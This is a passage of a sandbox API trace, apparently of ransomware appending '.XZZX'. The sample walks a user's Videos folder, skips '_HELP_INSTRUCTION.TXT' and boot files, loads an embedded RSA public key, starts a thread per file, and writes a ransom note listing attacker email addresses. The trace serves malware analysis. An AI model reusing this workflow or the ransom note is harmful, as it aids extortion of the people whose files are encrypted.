41 [0253.225] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0253.225] lstrcpyW (in: lpString1=0x17cf1c, lpString2="3A21FB2547CB7719582A8C7F4BEC5B61.XZZX" | out: lpString1="3A21FB2547CB7719582A8C7F4BEC5B61.XZZX") returned="3A21FB2547CB7719582A8C7F4BEC5B61.XZZX" [0253.225] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" [0253.225] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1404 [0253.225] Sleep (dwMilliseconds=0x96) [0253.380] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0253.380] lstrcmpW (lpString1="D0384500388B9600F42B1AE33CC07A48.XZZX", lpString2="..") returned 1 [0253.380] lstrcmpW (lpString1="D0384500388B9600F42B1AE33CC07A48.XZZX", lpString2=".") returned 1 [0253.380] StrStrW (lpFirst="D0384500388B9600F42B1AE33CC07A48.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0253.380] StrStrW (lpFirst="D0384500388B9600F42B1AE33CC07A48.XZZX", lpSrch="ntldr") returned 0x0 [0253.380] StrStrW (lpFirst="D0384500388B9600F42B1AE33CC07A48.XZZX", lpSrch="NTLDR") returned 0x0 [0253.381] StrStrW (lpFirst="D0384500388B9600F42B1AE33CC07A48.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0253.381] StrStrW (lpFirst="D0384500388B9600F42B1AE33CC07A48.XZZX", lpSrch="ntdetect.com") returned 0x0 [0253.381] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\", lpSrch="Desktop") returned 0x0 [0253.381] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\", lpSrch="DESKTOP") returned 0x0 [0253.381] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned 41 [0253.381] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0253.381] lstrcpyW (in: lpString1=0x17cf1c, lpString2="D0384500388B9600F42B1AE33CC07A48.XZZX" | out: lpString1="D0384500388B9600F42B1AE33CC07A48.XZZX") returned="D0384500388B9600F42B1AE33CC07A48.XZZX" [0253.381] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" [0253.381] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1408 [0253.381] Sleep (dwMilliseconds=0x96) [0253.536] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0253.537] lstrcmpW (lpString1="D89AF8F8162B0DAE766745D41A4BF1F6.XZZX", lpString2="..") returned 1 [0253.537] lstrcmpW (lpString1="D89AF8F8162B0DAE766745D41A4BF1F6.XZZX", lpString2=".") returned 1 [0253.537] StrStrW (lpFirst="D89AF8F8162B0DAE766745D41A4BF1F6.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0253.537] StrStrW (lpFirst="D89AF8F8162B0DAE766745D41A4BF1F6.XZZX", lpSrch="ntldr") returned 0x0 [0253.537] StrStrW (lpFirst="D89AF8F8162B0DAE766745D41A4BF1F6.XZZX", lpSrch="NTLDR") returned 0x0 [0253.537] StrStrW (lpFirst="D89AF8F8162B0DAE766745D41A4BF1F6.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0253.537] StrStrW (lpFirst="D89AF8F8162B0DAE766745D41A4BF1F6.XZZX", lpSrch="ntdetect.com") returned 0x0 [0253.537] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\", lpSrch="Desktop") returned 0x0 [0253.537] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\", lpSrch="DESKTOP") returned 0x0 [0253.537] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned 41 [0253.537] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0253.537] lstrcpyW (in: lpString1=0x17cf1c, lpString2="D89AF8F8162B0DAE766745D41A4BF1F6.XZZX" | out: lpString1="D89AF8F8162B0DAE766745D41A4BF1F6.XZZX") returned="D89AF8F8162B0DAE766745D41A4BF1F6.XZZX" [0253.537] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" [0253.537] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x140c [0253.537] Sleep (dwMilliseconds=0x96) [0253.693] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0253.693] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0253.693] lstrcmpW (lpString1="F12649BC389976C6163CED043CCE5B0E.XZZX", lpString2="..") returned 1 [0253.693] lstrcmpW (lpString1="F12649BC389976C6163CED043CCE5B0E.XZZX", lpString2=".") returned 1 [0253.693] StrStrW (lpFirst="F12649BC389976C6163CED043CCE5B0E.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0253.695] StrStrW (lpFirst="F12649BC389976C6163CED043CCE5B0E.XZZX", lpSrch="ntldr") returned 0x0 [0253.695] StrStrW (lpFirst="F12649BC389976C6163CED043CCE5B0E.XZZX", lpSrch="NTLDR") returned 0x0 [0253.695] StrStrW (lpFirst="F12649BC389976C6163CED043CCE5B0E.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0253.695] StrStrW (lpFirst="F12649BC389976C6163CED043CCE5B0E.XZZX", lpSrch="ntdetect.com") returned 0x0 [0253.695] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\", lpSrch="Desktop") returned 0x0 [0253.695] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\", lpSrch="DESKTOP") returned 0x0 [0253.695] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned 41 [0253.695] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0253.695] lstrcpyW (in: lpString1=0x17cf1c, lpString2="F12649BC389976C6163CED043CCE5B0E.XZZX" | out: lpString1="F12649BC389976C6163CED043CCE5B0E.XZZX") returned="F12649BC389976C6163CED043CCE5B0E.XZZX" [0253.695] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" [0253.695] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1410 [0253.696] Sleep (dwMilliseconds=0x96) [0253.848] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0253.848] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0253.848] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0253.848] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2="..") returned 1 [0253.848] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2=".") returned 1 [0253.849] StrStrW (lpFirst="_HELP_INSTRUCTION.TXT", lpSrch="_HELP_INSTRUCTION.TXT") returned="_HELP_INSTRUCTION.TXT" [0253.849] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0 [0253.849] FindClose (in: hFindFile=0x3cde9d8 | out: hFindFile=0x3cde9d8) returned 1 [0253.849] FindClose (in: hFindFile=0x3cde9d8 | out: hFindFile=0x3cde9d8) returned 0 [0253.849] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos" [0253.849] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\*.*" [0253.849] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\", lpSrch="Desktop") returned 0x0 [0253.849] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\", lpSrch="DESKTOP") returned 0x0 [0253.849] SetErrorMode (uMode=0x1) returned 0x1 [0253.849] wsprintfW (in: param_1=0x17c4dc, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_HELP_INSTRUCTION.TXT") returned 58 [0253.849] GetUserNameW (in: lpBuffer=0x17a2b8, pcbBuffer=0x17a0a4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17a0a4) returned 1 [0253.849] wsprintfW (in: param_1=0x17a0b0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0253.849] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17a0ac | out: phkResult=0x17a0ac*=0x1414) returned 0x0 [0253.849] RegQueryValueExW (in: hKey=0x1414, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x43de8e0, lpcbData=0x17a0a8*=0x104 | out: lpType=0x0, lpData=0x43de8e0*=0x65, lpcbData=0x17a0a8*=0x4a) returned 0x0 [0253.849] RegCloseKey (hKey=0x1414) returned 0x0 [0253.849] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17b4dc, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0253.849] wsprintfW (in: param_1=0x17a4dc, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0253.849] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1414 [0253.850] CloseHandle (hObject=0x1414) returned 1 [0253.850] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x3cde9d8 [0253.850] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos") returned="Videos" [0253.850] lstrcpyW (in: lpString1=0x17c6e4, lpString2="Videos" | out: lpString1="Videos") returned="Videos" [0253.850] lstrcpyW (in: lpString1=0x17d570, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos" [0253.850] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" [0253.850] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\", lpString2="DTMS 07a7Aq-XEUh0" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0" [0253.850] SetErrorMode (uMode=0x1) returned 0x1 [0253.850] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0" [0253.850] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\" [0253.850] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\" [0253.850] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\*.*" [0253.850] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0x3cdec58 [0253.850] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0") returned="DTMS 07a7Aq-XEUh0" [0253.850] lstrcpyW (in: lpString1=0x17b644, lpString2="DTMS 07a7Aq-XEUh0" | out: lpString1="DTMS 07a7Aq-XEUh0") returned="DTMS 07a7Aq-XEUh0" [0253.850] StrStrW (lpFirst="02D7186C2A67434F1071035C2E882797.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0253.850] StrStrW (lpFirst="02D7186C2A67434F1071035C2E882797.XZZX", lpSrch="ntldr") returned 0x0 [0253.850] StrStrW (lpFirst="02D7186C2A67434F1071035C2E882797.XZZX", lpSrch="NTLDR") returned 0x0 [0253.850] StrStrW (lpFirst="02D7186C2A67434F1071035C2E882797.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0253.850] StrStrW (lpFirst="02D7186C2A67434F1071035C2E882797.XZZX", lpSrch="ntdetect.com") returned 0x0 [0253.850] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\", lpSrch="Desktop") returned 0x0 [0253.850] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\", lpSrch="DESKTOP") returned 0x0 [0253.850] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\") returned 59 [0253.850] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0253.850] lstrcpyW (in: lpString1=0x17be7c, lpString2="02D7186C2A67434F1071035C2E882797.XZZX" | out: lpString1="02D7186C2A67434F1071035C2E882797.XZZX") returned="02D7186C2A67434F1071035C2E882797.XZZX" [0253.850] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\" [0253.850] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x141c [0253.851] Sleep (dwMilliseconds=0x96) [0254.004] FindNextFileW (in: hFindFile=0x3cdec58, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0254.004] lstrcmpW (lpString1="0790B504415F6E976181B814459452DF.XZZX", lpString2="..") returned 1 [0254.004] lstrcmpW (lpString1="0790B504415F6E976181B814459452DF.XZZX", lpString2=".") returned 1 [0254.004] StrStrW (lpFirst="0790B504415F6E976181B814459452DF.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0254.004] StrStrW (lpFirst="0790B504415F6E976181B814459452DF.XZZX", lpSrch="ntldr") returned 0x0 [0254.005] StrStrW (lpFirst="0790B504415F6E976181B814459452DF.XZZX", lpSrch="NTLDR") returned 0x0 [0254.005] StrStrW (lpFirst="0790B504415F6E976181B814459452DF.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0254.005] StrStrW (lpFirst="0790B504415F6E976181B814459452DF.XZZX", lpSrch="ntdetect.com") returned 0x0 [0254.005] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\", lpSrch="Desktop") returned 0x0 [0254.005] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\", lpSrch="DESKTOP") returned 0x0 [0254.005] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\") returned 59 [0254.005] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0254.005] lstrcpyW (in: lpString1=0x17be7c, lpString2="0790B504415F6E976181B814459452DF.XZZX" | out: lpString1="0790B504415F6E976181B814459452DF.XZZX") returned="0790B504415F6E976181B814459452DF.XZZX" [0254.005] lstrcpyW (in: 